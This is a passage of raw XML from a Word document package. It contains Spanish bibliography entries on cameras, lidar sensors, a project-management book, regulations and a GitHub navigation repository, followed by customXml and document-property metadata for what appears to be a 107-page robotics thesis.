    <b:Year>2022</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Seguridad Social</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>32</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>htt1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{04AA5610-F88F-406F-9D36-965F5F477E7E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>https://www.mites.gob.es/es/guia/texto/guia_6/contenidos/guia_6_14_1.htm</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>MITES</b:Title>
    <b:RefOrder>33</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>htt2</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{30ECE617-F89B-4C70-BE6B-EA87BF200A21}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>https://optitrack.com/cameras/flex-3/</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>OptiTrack</b:Title>
    <b:RefOrder>34</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BOE</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{CC713F53-EB04-4301-A51D-7C94A24DF94A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>BOE</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.boe.es/diario_boe/txt.php?id=BOE-A-2013-10541</b:Title>
    <b:RefOrder>35</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bia12</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{A0316872-4D73-43DD-A847-B0F34F16C63F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Biafore</b:Last>
            <b:First>Bonnie</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Stover</b:Last>
            <b:First>Teresa</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Gestión de Proyectos del Mundo Real</b:Title>
    <b:Year>2012</b:Year>
    <b:RefOrder>36</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Pla</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AB687C00-43FB-451C-9C93-3F14464531D9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>PlanDeMejora</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.plandemejora.com/crear-diagrama-de-gantt-online/</b:Title>
    <b:RefOrder>37</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Git</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{19CC6788-0405-4028-AC8D-AAD75B741894}</b:Guid>
    <b:Title>https://github.com/jsousp01/Simple-Navigation-Goals</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Código GitHub</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>38</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ASU19</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FB86B996-5839-4938-87BD-E644B07684A7}</b:Guid>
    <b:Title>https://www.researchgate.net/figure/The-Asus-Xtion-RGB-D-camera_fig2_339933560</b:Title>
    <b:Year>2019</b:Year>
    <b:Month>11</b:Month>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Octavian</b:Last>
            <b:First>ASUS</b:First>
            <b:Middle>Xtion David</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>39</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Hok</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1089A732-E111-44B8-9982-D8E4B14EEB8D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Hokuyo</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.hokuyo-aut.jp/search/single.php?serial=166#outline</b:Title>
    <b:RefOrder>40</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{33C9A40B-E2B3-490A-B32B-951042C4C4A5}">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B2F2E103-8F5E-4C79-978B-808E3F14FAB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A7EEA274-651D-4EE5-8F0E-1FC459367E18}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B10BC6E6-F98B-4275-B868-55EE8E448E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1461</TotalTime>
  <Pages>107</Pages>
  <Words>22862</Words>
  <Characters>130318</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1085</Lines>
  <Paragraphs>305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152875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Antonio Sousa Porto</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Raúl Núñez García</cp:lastModifiedBy>
  <cp:revision>1560</cp:revision>
  <cp:lastPrinted>2022-07-08T08:22:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-06T23:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-02T21:09:00Z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0x010100D0200E1FDE401D49A99B137CE017A12D</vt:lpwstr>
  </property>
</Properties>
</file>